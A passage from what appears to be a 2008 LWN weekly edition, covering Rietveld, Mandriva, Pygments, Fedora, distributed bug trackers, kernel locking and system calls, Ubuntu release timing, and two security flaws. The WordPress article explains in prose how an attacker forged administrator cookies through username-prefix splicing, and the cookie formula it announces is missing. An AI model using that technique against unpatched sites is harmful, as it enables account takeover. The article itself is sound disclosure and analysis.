comment box that a reviewer can fill in to attach some comments to that
line.  All comments are held as "drafts" until the reviewer is satisfied
with their review at which point they "publish" the comments for the author
and other reviewers to see. 


The Rietveld project is
free software, released under the Apache 2.0 license, while the application
itself runs via the Google App
Engine.  Anyone can browse the system, but folks who have a Google
account can add issues, comments, and conduct reviews using the tool.
Because it uses App Engine, people wanting to try it out on their
code need not find a server to install and run the application—as
would be required with Review Board—they can just upload a set of
patches, invite some reviewers, and proceed.   


This kind of simplified deployment is one of the benefits that Google App
Engine is meant to provide.  For free software projects, where code review is
purposely done in the open, Rietveld provides a way to quickly try the
application out.  Those who wish to keep their source code secret may want
to install their own instance of Review Board or another tool.  It may be possible to
install Rietveld in a different environment by replacing the App
Engine-specific pieces, but that clearly is not where it is targeted.

 While Rietveld does not provide much in the way of additional
functionality from Review Board—in fact it lags Review Board in some
areas—it does provide a very nice introduction to the Google App
Engine interface.  Developers will undoubtedly be using the code as a
template for their own ideas once Google makes more App Engine accounts
available.  Given the shared history, language, and framework, it isn't
impossible to imagine that Review Board and Rietveld might join forces one
day.  Even if they don't, some cross-pollination is inevitable which will
result in both getting better.  Hopefully, with more projects using one or
both, better code for the community is the result.  

		Looking ahead to Mandriva Linux 2009


With Mandriva Linux 2008 Spring out the door, the first steps toward
Mandriva Linux 2009 are in progress.  Ideas are being collected on this wiki
page and Bugzilla is open for suggestions and ideas.  The wiki page
begins with instructions for entering ideas and suggestions into Bugzilla.

A number of items are in the wish list for kernel and hardware support.
The ML 2009 kernel will use libata, the one item already marked as
complete (better late than never).  Other wishes include an installed and enabled kerneloops
package, full support for Lenovo Thinkpads T60/T61 (and T62 in the future)
(with all the bells, whistles, drivers, hotkeys, LEDs, etc. working),
making Xen work properly (or dropping it), and patches for kernel-level
mode setting.

There is a request for virtualbox 1.6 to be added to the toolchain, along
with cmake and svn.  The RPM, URPMI requests include better separation of
free and non-free so that non-free sources do not get installed on an
otherwise free system; and better dependency handling.

Some requests involve making it easier to use a lightweight desktop/window
manager.  There is an Xfce edition for ML 2008.1, but some would like the
Xfce edition to be an official part of the 2009 release.  Requests for
improved icewm support are joined by requests for LXDE, and Enlightenment
17.

No matter how good an installer is, there is always room for improvement and
some ideas are on the list.  The same could be said for system tools, and
several improvements to Drakxtools are also on the list.  The list ends with
suggestions for better internationalization and localization support.

Those who have ideas about improving Mandriva Linux, now is the time to get
involved.  File bug reports where features seem to be missing, and help
make ML 2009 better than ever.

		Pygments - the Python Syntax Highlighter


Pygments is a multi-language
syntax highlighter that is written in Python and distributed under
the BSD license. The project description states:


It is a generic syntax highlighter for general use in all kinds of software such as forum systems, wikis or other applications that need to prettify source code. Highlights are:

a wide range of common languages and markup formats is supported
 special attention is paid to details that increase highlighting quality
 support for new languages and formats are added easily; most languages use a simple regex-based lexing mechanism
 a number of output formats is available, among them HTML, RTF, LaTeX and ANSI sequences
 it is usable as a command-line tool and as a library
 ... and it highlights even Brainf*ck!


The project FAQ notes that
Pygments supports a long (and expandable)
collection of input languages.
It can produce output as HTML, LaTeX, RTF and ANSI sequences for
console output.  The software can be run from the pygmentize
command-line tool, or accessed from your own Python code.  See the
command line reference
for details on running pygmentize.


Pygments version 0.10 was recently
announced.
Changes include the addition of 15 new language
lexers, expansion
of the Makefile lexer's capabilities, the ability to output in several
image formats, a new style and other enhancements and fixes.


Installation of Pygments was straightforward on an Ubuntu 7.04 system.
A tar.gz file was downloaded from the
Python package
site.  The file was uncompressed with gunzip and extracted with tar.
Running python setup.py install as root on the setup script
installed the software and it was ready to run.
After a quick read of the

Command Line Usage document, your author was able to run
pygmentize on  some Python code and produce some rather pleasing
colorized html output.

<!-- LWNPutAdHere -->

The project's demo
page has a number of examples of Pygment's output, it also allows
you to upload your own code to see how it looks after formatting.


Pygments looks to be a well designed generic tool.
It could useful for online and offline documentation, code analysis,
education and much more.  This
list of projects
is already putting Pygments to use, perhaps your project could
make use of it as well.


		Cryptographic splicing makes for a Wordpress vulnerability


 Authentication bypass vulnerabilities are particularly painful because
they allow an attacker to access and potentially modify things that should
be off-limits.  It is important to ensure that when fixing that kind of
bug, one does not introduce a different, but equally potent, hole.  A
recent Wordpress
vulnerability clearly demonstrates the care that needs to be taken.


The problem started in November 2007, when Steven Murdoch reported
a problem with Wordpress authentication cookies.  Essentially, the
cookie that Wordpress used was an MD5 hash calculated using a value stored
in the database's user table.  Any attacker that could get read access to the
database, via a SQL injection or looking inside a database backup for example, could
generate a cookie value that would allow them access as that user.  


The password itself was not stored in the database as plaintext, but the
value used in the cookie was just a simple MD5 of the stored value.  So,
the value stored was MD5(password) and the cookie value was
MD5(MD5(password)).  Murdoch released his advisory in advance of a
fix, because the vulnerability was being actively exploited.  It was
entered as bug #5367 into
the Wordpress bug tracking system and a long conversation about how to
properly fix it ensued.


As part of that discussion, Murdoch suggested that a paper entitled "Dos and Don'ts of
Client Authentication on the Web" [PDF] be consulted.  The paper covers
various issues regarding cookies and the kinds of attacks that can be made
against them.  Some, but not all, of its recommendations were followed.


The new cookie scheme was released at the end of March as part of the
Wordpress
2.5 release.  Authentication cookie values were now calculated using the
following (with the '.' operator representing concatenation):

This took into account the hazards of a straightforward hash of a stored
value and added an expiration to the cookie, but it failed to protect
against a cryptographic splicing attack.


When calculating the hash of the concatenation of the username and
expiration (along with a secret known by the server), no delimiter was used between the two.  This means that the hash
for username "foobar" with expiration "20080507" is the same as the hash
for username "foo" with expiration "bar20080507".  This allows anyone with
a username that begins the same as another username, to generate a
legitimate cookie for that other user.  Using the example above, user "foobar" could create
valid cookies for a user "foo" (or any other prefix substring).


Many Wordpress weblogs allow new users to create an account with any name
they choose, so long as it is not already taken.  By choosing one that
starts with the administrator's username, an attacker can generate a cookie for
themselves, modify it slightly, and have a valid cookie to access the
administrator account.  No password cracking is required, nor is any access
to the database needed.


Wordpress 2.5.1 has been released
to address this problem.  Earlier versions could disable the registration
feature and delete or suspend any user accounts with suspicious usernames
as a workaround.  Though if those suspicious accounts exist, it would not
be surprising to find that the real administrator no longer knows the
proper password for that account.


The paper that Murdoch referenced clearly indicated the danger from
cryptographic splicing, but the Wordpress implementers must have missed
it.  Cookie authentication schemes are a necessary evil for web
applications—it would be nearly unusable to have to authenticate on
each page—but they are difficult to get right.  A careful reading of
the paper will help, as will using already vetted libraries or frameworks.
It is one of those things that is hard to get right and extremely
important to do so.


		A Talk with Fedora Project Leader Paul Frields


Late last week I had the pleasure of talking with Fedora Project Leader
Paul Frields.  Our conversation covered a range of Fedora Project topics,
including Fedora 9, the latest Fedora release.

One thing Paul is passionate about is getting people to volunteer.  There
are many ways to get involved with the Fedora Project, lots of sub-projects
and Special Interest Groups (SIGs) that people can join depending on their
interests and talents.  The Fedora
Project wiki is a good starting point for finding out more.  The Join Fedora page also goes
into the various roles that a Fedora contributor might be suited for, with
easy links to setting up a Fedora account and using the Fedora Account
system.  You don't have to be a programmer or a computer expert to
contribute to the project.

Joining the Fedora Project is easier now than it ever was during Fedora's
five year history.  As a result Fedora now has over 2000 registered account
holders.  That includes about 350 ambassadors who promote Fedora in their
local area.  In addition to making it easier to become a Fedora
contributor, a variety of new web applications/collaborative tools are now
available for contributors.  Of course all Fedora infrastructure is Free
Software, available in the Fedora repository, and running on Fedora.

All registered account holders may vote in Fedora elections, which is worth
noting because there is an election coming up
in June.

The composition of the Fedora board was
recently changed to five elected members of the nine board seats.  Four
of those seats will be voted on in the next election.  The other board
seats are appointed by Red Hat, but are not necessarily Red Hat employees.
Red Hat retains some control by employing and appointing the Project
Leader.  Paul took a job with Red Hat when he was offered the position of
Project Leader.

Paul mentioned that former Fedora Project Leader Max Spevack is moving to
the Netherlands to organize and manage Fedora volunteers in Europe.  Paul
also mentioned that Fedora has many Brazilian contributors.  Of course Red
Hat employs some Fedora engineers.  There are fourteen Red Hat employees
working full time on Fedora, mostly acting as team leaders and organizing
the volunteers.  In addition all Red Hat engineers will spend some fraction
of their time working on Fedora in areas where Red Hat Enterprise Linux in
involved.

Some people think of Fedora as a beta for Red Hat Enterprise Linux, but its
more realistic to think of Fedora as the upstream source for its
enterprising cousin and spin-offs such as CentOS.  So even though Fedora is
a community project, Red Hat is still very involved in its development.

FUDCon (Fedora User
&amp; Developer Conference) is an event held on an irregular schedule
several times per year.  Some are smaller events held in conjunction with a
larger event, such as the May 30, 2008 FUDCon, which will be held at
LinuxTag in Berlin, Germany.  Further out, there is some talk of having a
mini-FUDCon at the 2009 linux.conf.au.  The Boston FUDCon coming up in
June, will run for several days.  Co-located with the Red Hat Summit, the
Boston FUDCon will feature hackfests, a barcamp and technical talks.

The Red Hat Summit will bring in Red Hat customers, and include talks about
actual use cases.  These talks should be interesting for Fedora developers,
who will have a chance to see what people are doing with their work
downstream.  FUDCon is open to anyone, so stop by if there is a FUDCon in
your area.

On to the just released Fedora 9 and the
upcoming Fedora 10.  Fedora 9 is one of the first major releases to feature
KDE 4 by default.  To make this work, the KDE SIG has built a compatibility
library to keep KDE 3 applications running properly.  For Fedora 10 Casey
Dahlin is working on replacing the init system with upstart, the system developed for Ubuntu.

Some other items that we touched on briefly: Fedora maintains an open build
system and works at getting patches upstream.  The project also strives to
cooperate with other distributions.  From what I've seen, Fedora 9 looks
very good, attractive and functional.  Now that rawhide has moved on to Fedora 10 it will be a rough ride
for at least a few days.  So stick with Fedora 9, or get it from a mirror
near you.

Fedora 9 is Paul's first release as Project Leader and he had a few words to add.  "It's been less than
five years since the first release of Fedora (back when it was called
Fedora Core), and in that time Fedora has become not just a vibrant,
innovative, and extremely popular Linux distribution, but also a thriving
community.  A community that believes that free and open source software is
not just something you *use*, it's something you *do* -- something to which
you *contribute*."

		Distributed bug tracking


It is fair to say that distributed source code management systems are
taking over the world.  There are plenty of centralized systems still in
use, but it is a rare project which would choose to adopt a centralized SCM
in 2008.  Developers have gotten too used to the idea that they can carry
the entire history of their project on their laptop, make their changes,
and merge with others at their leisure.

But, while any developer can now commit changes to a project while strapped
into a seat in a tin can flying over the Pacific Ocean, that developer
generally cannot simultaneously work with the project's bug database.
Committing changes and making bug tracker changes are activities which
often go together, but bug tracking systems remain strongly in the
centralized mode.  Our ocean-hopping developer can commit a dozen fixes,
but updating the related bug entries must wait until the plane has landed
and network connectivity has been found.


There are a number of projects out there which are trying to change this
situation through the creation of distributed bug tracking systems.  These
developments are all in a relatively early state, but their potential
- and limitations - can be seen.


One of the leading projects in this area is Bugs Everywhere, which has recently
moved to a new home with Chris Ball as its new maintainer.  Bugs
Everywhere, like the other systems investigated by your editor, tries to
work with an underlying distributed source code management system to manage
the creation and tracking of bug entries.  In particular, Bugs Everywhere
creates a new directory (called .be) in the top level of the
project's directory.  Bugs are stored as directories full of text files
within that directory, and the whole collection is managed with the
underlying SCM.


The advantages to an approach like this are clear.  The bug database can
now be downloaded along with the project's code itself.  It can be branched
along with the code; if a particular branch contains a fix for a bug, it
can also contain the updated bug tracker entry.  That, in turn, ensures
that the current bug tracking information will be merged upstream at
exactly the same time as the fix itself.  Contemporary projects are
characterized by large numbers of repositories and branches, each of which
can contain a different set of bugs and fixes; distributing the bug
database into these repositories can only help to keep the code and its bug
information consistent everywhere.


There are also some disadvantages to this scheme, at least in its current
form.  Changes to bug entries don't become real until they are committed
into the SCM.  If a bug is fixed, committing the fix and the bug tracker
update at the same time makes sense; in cases where one is trying to add
comments to a bug as part of an ongoing conversation the required commit is
just more work to do.  That fact that, in git at least, one must explicitly
add any new files created by the bug tracker (which have names like
12968ab9-5344-4f08-9985-ef31153e504f/comments/97f56c43-4cf2-4569-9ef4-3e8f2d9eb1fe/body)
does not help the situation.


Beyond that, tracking bugs this way creates two independent sets of
metadata - the bug information itself, and whatever the developer added
when committing changes.  There is currently no way of tying those two
metadata streams together.  Then, there is the issue of merging.  Bugs
Everywhere appears to reflect some thought about this problem; most changes
involve the creation of new, (seemingly) randomly-named files which will not
create conflicts at merge time.  It did not take long, however, for your
editor to prove that changing the severity of a bug in two branches and
merging the result creates a conflict which can only be resolved by
hand-editing the bug tracker's files.  Said files are plain text, but that
is less comforting than one might think.


[PULL QUOTE: 
All of this can make distributed bug tracking look like a source of more
work for developers, which is not the path to world domination.
 END QUOTE]


All of this can make distributed bug tracking look like a source of more
work for developers, which is not the path to world domination.  What is
needed, it seems, is a combination of more advanced tools and better
integration with the underlying SCM.  Bugs Everywhere, by trying to work
with any SCM, risks not being easily usable with any of them. 


A project which is trying for closer integration is ticgit, which, as one
might expect, is based on git.  Ticgit takes a different approach, in that
there are no files added to the project's source tree, at least not
directly; instead, ticgit adds a new branch to the SCM and stores the bug
information there.  That allows the bug database to travel with the source
(as long as one is careful to push or pull the ticgit branch!) while keeping the
associated files out of the way.  Ticgit operations work on the git object
database directory, so there is no need for separate commit operations.  On
the other hand, this approach loses the ability to have a separate view of
the bug database in each branch; the connection between bug fixes and bug
tracker changes has been made weaker.  This is something which can be
fixed, and it would appear (from comments in the source) that dealing with
branches is on the author's agenda.


Ticgit clearly has potential, but even closer integration would be
worthwhile.  Wouldn't it be nice if a git commit command would
also, in a single operation, update the associated entry in the bug
database?  Interested developers could view a commit which is alleged to
fix a bug without the need for anybody to copy commit IDs back and forth.
Reverting a bugfix commit could automatically reopen the bug.  And so on.
In the long run, it is hard to see how a truly integrated, distributed bug
tracker can be implemented independently of the source code management
system.


There are some other development projects in this area, including:


 Scmbug is a relatively 
     advanced project which aims "to solve the integration problem once and
     for all."  It is not truly a distributed bug tracker, though; it
     depends on hooks into the SCM which talk to a central server.
     Regardless, this project has done a significant amount of thinking
     about how bug trackers and source code management systems should work
     together.

 DisTract is a
     distributed bug tracker which works through a web interface.  To that
     end, it uses a bunch of Firefox-specific JavaScript code to run local
     programs, written 
     in Haskell, which manipulate bug entries stored in a Monotone
     repository.  Your editor confesses that he did not pull together all
     of the pieces needed to make this tool work.

 DITrack is a set of Python
     scripts for manipulating bug information within a Subversion
     repository.  It is meant to be distributed (and, eventually,
     "backend-agnostic"), but its use of Subversion limits how distributed
     it can be for now.

 Ditz is a set of Ruby scripts
     for manipulating bug information within a source code management
     system; it has no knowledge of the SCM itself.


As can be seen, there is no shortage of work being done in this area,
though few of these projects have achieved a high level of usability.  Only
Scmbug has been widely deployed so far.  A few of these projects have the
potential to change the way development is done, though, once various
integration and user interface issues are addressed.

There is one remaining problem, though, which has not been touched upon
yet.  A bug tracker serves as a sort of to-do list for developers, but
there is more to it than that.  It is also a focal point for a conversation
between developers and users.  Most users are unlikely to be impressed by a
message like "set up a git repository and run these commands to file or
comment on a bug."  There is, in other words, value in a central system
with a web interface which makes the issue tracking system accessible to a
wider community.  Any distributed bug tracking system which does not
facilitate this wider conversation will, in the end, not be successful.
Creating a distributed tracker which also works well for users could be the
biggest challenge of them all.

		The big kernel lock strikes again


When Alan Cox first made Linux work on multiprocessor systems, he added a
primitive known as the big kernel lock (or BKL).  This lock, originally,
ensured that only one processor could be running kernel code at any given
time.  Over the years, the role of the BKL has diminished as increasingly
fine-grained locking - along with lock-free algorithms - have been
implemented throughout the kernel.  Getting rid of the BKL entirely has
been on the list of things to do for some time, but progress in that
direction has been slow in recent years.  A recent performance regression
tied to the BKL might give some new urgency to that task, though; it also
shows how subtle algorithmic changes can make a big difference.


The AIM benchmark attempts to measure system throughput by running a large
number of tasks (perhaps thousands of them), each of which is exercising
some part of the kernel.  Yanmin Zhang reported that his AIM results got about 40%
worse under the 2.6.26-rc1 kernel.  He took the trouble to bisect the
problem; the guilty patch turned out to be the generic semaphores code.
Reverting that patch made the performance regression go away - at the cost
of restoring over 7,000 lines of old, unlamented code.  The thought of
bringing back the previous semaphore implementation was enough to inspire a
few people to look more deeply at the problem.


It did not take too long to narrow the focus to the BKL, which was converted to a semaphore a few
years ago.  That part of the process was easy - there aren't a whole lot of
other semaphores left in the kernel, especially in performance-critical
places.  But the BKL stubbornly remains in a number of core places,
including the fcntl() system call, a number of ioctl()
implementations, the TTY code, and open() for char devices.
That's enough for a badly-performing BKL to create larger problems,
especially when running VFS-heavy benchmarks with a lot of contention.


Ingo Molnar tracked down the problem in the
new semaphore code.  In short: the new semaphore code is too fair for its
own good.  When a semaphore is released, and there is another thread
waiting for it, the semaphore is handed over to the new thread (which is
then made runnable) at that time.  This approach ensures that threads
obtain the semaphore in something close to the order in which they asked
for it.


The problem is that fairness can be expensive.  The thread waiting for the
semaphore may be on another processor, its cache could be cold, and it
might be at a low enough priority that it will not even begin running for
some time.  Meanwhile, another thread may request the semaphore, but
it will get put at the end of the queue behind the new owner, which may not
be running yet.  The result is a certain amount of dead time where no
running thread holds the semaphore.  And, in fact, Yanmin's
experience with the AIM benchmark showed this: his system was running idle
almost 50% of the time.


The solution is to bring in a technique from the older semaphore code: lock
stealing.  If a thread tries to acquire a semaphore, and that semaphore is
available, that thread gets it regardless of whether a different thread is
patiently waiting in the queue.  Or, in other words, the thread at the head
of the queue only gets the semaphore once it starts running and actually
claims it; if it's too slow, somebody else might get there first.  In human
interactions, this sort of behavior is considered impolite (in some
cultures, at least), though it is far from unknown.  In a multiprocessor
computer, though, it makes the difference between acceptable and
unacceptable performance - even a thread which gets its lock stolen will
benefit in the long run.


Interestingly, the patch which implements this change was merged into the
mainline, then reverted before 2.6.26-rc2 came out.  The initial reason for the
revert was that the patch broke semaphores in other situations; for some
usage patterns, the semaphore code could fail to wake a thread when the
semaphore became available.  This bug could certainly have been fixed, but
it appears that things will not go that way - there is a bit more going on
here.


What is happening instead is that Linus has committed a patch which simply
turns the BKL into a spinlock.  By shorting out the semaphore code
entirely, this patch fixes the AIM regression while leaving the slow (but
fair) semaphore code in place.  This change also makes the BKL
non-preemptible, which will not be entirely good news for those who are
concerned with latency issues - especially the real time tree. 

The reasoning behind this course of action would appear to be this: both
semaphores and the BKL are old, deprecated mechanisms which are slated for
minimization (semaphores) or outright removal (BKL) in the near future.
Given that, it is not worth adding more complexity back into the semaphore
code, which was dramatically simplified for 2.6.26.  And, it seems, Linus
is happy with a sub-optimal BKL:


	Quite frankly, maybe we _need_ to have a bad BKL for those to ever
	get fixed. As it was, people worked on trying to make the BKL
	behave better, and it was a failure. Rather than spend the effort
	on trying to make it work better (at a horrible cost), why not just
	say "Hell no - if you have issues with it, you need to work with
	people to get rid of the BKL rather than cluge around it".


So the end result of all this may be a reinvigoration of the effort to
remove the big kernel lock from the kernel.  It still is not something
which is likely to happen over the next few kernel releases: there is a lot
of code which can subtly depend on BKL semantics, and there is no way to be
sure that it is safe without auditing it in detail.  And that is not a
small job.  Alan Cox has been reworking the TTY code for some time, but he
has some ground to cover yet - and the TTY code is only part of the
problem.  So the BKL will probably be with us for a while yet.

		Extending system calls


Getting interfaces right is a hard, but necessary, task, especially when
that interface 
has to be supported "forever".  Such is the case with the system call
interface that
the kernel presents to user space, so adding features to it must be done
very carefully.  Even so, when Ulrich Drepper set out to remove a hole that could lead to a
race condition, he probably did not expect all the different paths that
would need to be tried before closing in on an acceptable solution.


The problem stems from wanting to be able to create file descriptors with
new properties—things like close-on-exec, non-blocking, or
non-sequential descriptors.  Those features were not considered when the
system call interface was developed.  After all, many of those system calls
are essentially unchanged from early Unix implementations of the 1970s.
The open() call is the most obvious way to request a file descriptor
from the kernel, but there are plenty of others.


In fact, open() is one of the easiest to extend with new
features because of its flags argument.  Calls like
pipe(), socket(), accept(),
epoll_create() and others produce file descriptors as well, but don't
have a flags argument available.  Something different would have
to be done to support additional features for the file descriptors
resulting from those calls.


The close-on-exec functionality is especially important to close a security
hole for multi-threaded programs.  Currently, programs can use 
fcntl() to change an open file descriptor to have the close-on-exec property,
but there is always a window in time between the creation of the descriptor and
changing its behavior.  Another thread could do an exec() call in
that window, leaking a potentially sensitive file descriptor into the newly
run program.  Closing that window requires an in-kernel solution.


Back in June of last year, after some false starts, Linus Torvalds suggested adding an
indirect() system call, as a way to pass flags to system calls
that don't currently support them.  The indirect() call would
apply a set of flags to the invocation of an existing system call.  This
would allow existing calls to remain unchanged, with only new uses calling
indirect().  User space programs would be unlikely to call the new
function directly, instead they would call glibc functions that
handled any necessary 
indirect() calls.


Davide Libenzi created a sys_indirect() patch in July, but Drepper
saw it as "more complex than warranted".  So Drepper created his own "trivial"
implementation, that was described on this page in
November.  It was met with a less than enthusiastic response on
linux-kernel for being, amongst other things, an exceedingly ugly
interface.  


The alternative to sys_indirect() is to create a new system call
for each existing call that needed a flags argument.  This was seen as
messy by some, including Torvalds, leading some kernel hackers into looking for alternatives.  The indirect approach
also had some other potential benefits, though, because it was seen as something that
could be used by syslets to
allow asynchronous system calls.  No decision seemed to be forthcoming,
leading Drepper to ask Torvalds for one:

Will you please make a decision regarding sys_indirect?  There has been
no other proposal so the alternative is to add more syscalls.


To bolster his argument that sys_indirect() was the way to go,
Drepper also created a patch to add some of
the required system calls.   He started with the socket()
family, by adding socket4(), socketpair5(), and
accept4()—tacking the number of arguments onto the function
name a la wait3() and wait4().   Drepper's intent may not
have been well served by choosing those calls as Alan Cox immediately noted that the type argument could be
overloaded:

Given we will never have 2^32 socket types, and in a sense this is part
of the type why not just use

that would be far far cleaner, no new syscalls on the socket side at all.


Michael Kerrisk looked over the set of system calls that generate file
descriptors, categorizing them based on whether they needed a
flag argument added.  He observed that roughly half of the file
descriptor producing calls need not change because they could either use an
overloading trick like the socket calls, the glibc API already added a
flags argument, or there were alternatives available to provide the same
functionality along with flags.


In response, Drepper made one last attempt to push the indirect approach,
saying:

Or we just add sys_indirect (which is also usable for other syscall
extensions, not just the CLOEXEC stuff) and let userlevel (i.e., me)
worry about adding new interfaces to libc.  As you can see, for the more
recent interfaces like signalfd I have already added an additional
parameter so the number of interface changes would be reduced.


Even though the indirect approach has some good points, Torvalds liked the
approach advocated by Cox, saying:

Ok, I have to admit that I find this very appealing. It looks much
cleaner, but perhaps more importantly, it also looks both readable and
easier to use for the user-space programmer.


Ultimately, developers will only use these new interfaces if they can
easily test for the existence of the new code.  Torvalds  gives an example
of how that might be done using the O_NOATIME flag to
open(), which has only been available since 2.6.8.  It is this
testability issue that makes him believe the flags-based approach is the
right one:

And that's the problem with anything that isn't flags-based. Once you do
new system calls, doing the above is really quite nasty. How do you
statically even test that you have a system call? Now you need to add a
whole autoconf thing for it existing, and when it does exist you still
need to test whether it works, and you can't even do it in the slow-path
like the above (which turns the failure into a fast-path without the
flag).


This new approach, with a scaled down number of new system calls rather
than adding a general-purpose system call extension mechanism like
sys_indirect(), is now being pursued by Drepper.  In the explanatory patch at the start of the series,
he lays out which 
of the system calls will require a new user space interface: paccept(), epoll_create2(),
dup3(), 
pipe2(), and
inotify_init1(), as well as those that do not:
signalfd4(),
eventfd2(),
timerfd_create(), 
socket(), and
socketpair().


Drepper has already made
several iterations of patches addressing most of the concerns expressed by
the kernel developers along the way.  There have been some architecture
specific problems, but Drepper has been knocking those down as well.  If no
further roadblocks appear, it would seem a likely candidate for inclusion
in 2.6.27.


		Release synchronization


For those who have not seen it, Mark Shuttleworth's recent The Art of Release
posting is worth a look.  He starts with some rather self-congratulatory
talk about the Ubuntu 8.04 release, saying:


	To the best of my knowledge there has never been an "enterprise
	platform" release delivered exactly on schedule, to the day, in any
	proprietary or Linux OS. 


One could quibble with this claim in a number of ways, but it is true that
Ubuntu got out a release designed to be supported for a number of years,
and they did it when they said they would.  That, of course, is only part
of the job; now they have to follow through on that little promise of
supporting this distribution into 2011.  The initial signs
are good: Ubuntu's support thus far has been solid, and it would appear
that the distribution will not be going away anytime soon. 

One might well question whether the timely release of 8.04 is noteworthy.
As a community we are increasingly spoiled; an increasingly large number of
projects and distributions manage to get out regular releases on a
reasonably predictable schedule.  Even kernel releases, once known to slip
for a year or more, are now predictable to within a couple of weeks.  Now
that free software releases are rather more predictable and reliable than,
say, airline departures, why is the Ubuntu 8.04 release noteworthy?

The answer is the long-term support commitment.  Theoretically, a
distribution intended for this sort of long lifetime will have had a degree
of extra care put into its preparation.  Important components will have
been given extra time to stabilize so that the distribution will be more
reliable from the outset.  Some thought will have gone into the selection
of packages shipped with an emphasis on supportability over the long term.
The whole process requires more effort and a higher degree of assurance
that all of the pieces are truly ready.

The degree to which Ubuntu has done all of that work should become clear
over time.  Certainly the software selected for this release is rather less
seasoned than the packages found in a Red Hat or SUSE enterprise release.
But "older" does not necessarily mean "better" or "more stable," so the
real proof will be in how well this distribution holds up for the next
three years.

Meanwhile, Mr. Shuttleworth has already stated that the next long-term
support release will be happening in April, 2010.  Ubuntu's success with
8.04, he says, allows this commitment to be made almost two years in
advance.  There is, however, a possibility that things could change:


	There's one thing that could convince me to change the date of the
	next Ubuntu LTS: the opportunity to collaborate with the other,
	large distributions on a coordinated major / minor release
	cycle. If two out of three of Red Hat (RHEL), Novell (SLES) and
	Debian are willing to agree in advance on a date to the nearest
	month, and thereby on a combination of kernel, compiler toolchain,
	GNOME/KDE, X and OpenOffice versions, and agree to a six-month and
	2-3 year long term cycle, then I would happily realign Ubuntu's
	short and long-term cycles around that.


This idea is not new, but Mr. Shuttleworth seems to be particularly
attached to it.  There is no doubt that there would be advantages to
aligning schedules in this way.  The kernel developers, who have been known
to make a special effort for a release destined to be used by a major
enterprise distributor, could focus especially hard on a stable release
knowing that it would be widely used.  Higher-level projects could do the
same.  The distributors could also, perhaps, find a way to collaborate on
the long-term maintenance of these components, rather than duplicating the
effort of backporting patches into older code.  Perhaps they could even get
together for a joint release party, saving even more money.

Or perhaps this is all a nice idea which fails to survive its encounter
with reality.  Enterprise distribution releases tend to be
highly-publicized events.  Ubuntu might be happy to share its limelight
with the larger distributors, but that feeling might not be reciprocated on
the other side.  It is hard to imagine Red Hat or Novell wanting to have
their big enterprise distribution release be just one of many happening
during the same month.

It is also hard to see Ubuntu making an agreement with the
enterprise distributors which specifies both a release date
and the versions of the major components.  8.04 released with the 2.6.24
kernel, which was almost exactly three months old at the time.  Red Hat
Enterprise Linux 5 released in mid-March, 2007, when the 2.6.20 kernel
was current - but Red Hat shipped the six-month-old 2.6.18 kernel instead.
Aligning schedules would require more than picking a date; it would also
require adopting similar stabilization periods.  It is far from clear that
Ubuntu would want to fall that far behind the leading edge for the sake of
alignment.

And, frankly, it's hard to imagine Debian making a credible commitment
(within one month) to a release date at all.

So the aligned schedules for enterprise distributions seems like a hard
sell.  A better approach might be to try to wean these distributions off
the "freeze and backport" model of support; this model is expensive to
sustain, brings risks of its
own, and doesn't always fit
the needs of enterprise customers..  If the enterprise distributors
were able to track more current software - rather than backporting pieces
of it into older software - better alignment of releases might just come
naturally.

		Debian, OpenSSL, and a lack of cooperation


A rather nasty security hole in the Debian OpenSSL package has generated a
lot of interest—along with a fair amount of controversy—amongst
Linux users.  The bug has been lurking for up to two years in Debian and other
distributions, like Ubuntu, based on it.  There are a number of lessons to
be learned here about distributions and projects working together or, as in
this case, failing to work together.


Back in April 2006, a Debian user reported a
problem using the OpenSSL library with valgrind, a tool that can check
programs for memory access problems.  It was reporting that OpenSSL was
using uninitialized memory in parts of the random number generator (RNG)
code.  Using memory before it is initialized to a known value is a well
known way to create hard-to-find bugs, so it is not surprising that the
valgrind report caused some consternation.


Debian hacker Kurt Roeckx tracked the problem down to what he thought were
two offending lines of code and posted a question on
the openssl-dev mailing list:

What I currently see as best option is to actually comment out
those 2 lines of code.  But I have no idea what effect this
really has on the RNG.  The only effect I see is that the pool
might receive less entropy.  But on the other hand, I'm not even
sure how much entropy some unitialised data has.

What do you people think about removing those 2 lines of code?


There were few responses, but they were not opposed to removing the lines,
including one from Ulf
Möeller using an openssl.org email address: "If it helps
with debugging, I'm in favor of removing them."   Unfortunately, as
was discovered recently, removing one of the two lines was harmless, the
other essentially crippled the RNG so that OpenSSL-generated cryptographic
keys were easy to predict. 
(For more technical details on the bug and what should be done to respond to
it, see our article on this
week's Security page.)


It turns out, at
least according to OpenSSL core team member Ben Laurie, that openssl-dev is not for discussing
development of OpenSSL.  That may be true in practice, but the OpenSSL support web page describes
it as: "Discussions on development of the OpenSSL library. Not for
application development questions!"  In addition, the address
suggested by Laurie (openssl-team-AT-openssl.org) does not appear in any of
the OpenSSL
documentation or web pages.  If it wasn't the right place, it would seem
that the OpenSSL developers could have provided a helpful pointer to the right address, but that did not occur.


It probably was not clear that Roeckx was asking the questions in an
official Debian capacity, nor that he was planning to change the
Debian package based on the answer to his questions.  As Laurie rightly points out, he should
have submitted a patch, proposing that it be accepted into the upstream
OpenSSL codebase.  That probably would have garnered more attention, even
if it was only posted to openssl-dev.  It seems very unlikely that
the patch in question would have ever made it into an OpenSSL release. 


It is in the best interests of everyone, distributions, projects, and
users, for changes made downstream to make their way back upstream.  In
order for that to work, there must be a commitment by downstream
entities—typically distributions, but sometimes users—to push
their changes upstream.  By the same token, projects must actively
encourage that kind of activity by helping patch proposals and
proposers along.
First and foremost, of course, it must be absolutely clear where such
communications should take place.


Another recently reported security vulnerability also came about
because of a lack of cooperation between the project and distributions.  It
is vital, especially for core system security packages like OpenSSH and
OpenSSL, that upstream and downstream work very closely together.  Any
changes made in these packages need to be scrutinized carefully by the
project team before being released as part of a distribution's
package.  It is one thing to let some kind of ill-advised patch be made to
a game or even an office application package that many use; SSH and SSL form the
basis for many of the tools used to protect systems from attackers, so they
need to be held to a higher standard.


Another of Laurie's points, which also bears out the need for a higher
standard, is the timing of the check-in
to a public repository when compared to that of the advisory.
Any alert attacker could have made very good use of the five or six day
head start, they could have gotten by monitoring the repository, to exploit
the vulnerability.  While it is certainly possible that some of malicious
intent already knew about the flaw, though no exploits have been reported,
alerting potential attackers to this kind of hole well in advance of
alerting the
vulnerable users is unbelievably bad security protocol.


This is the kind of problem that could have been handled quickly and
quietly by all concerned.  All affected distributions—though it might
be difficult to list all of the Debian-derived distributions out
there—could have been contacted so that the advisory and updates to
affected packages could have been coordinated.  One of these days, one of
these problems is going to give Linux a security black eye unless the
community can do a better job of working together.


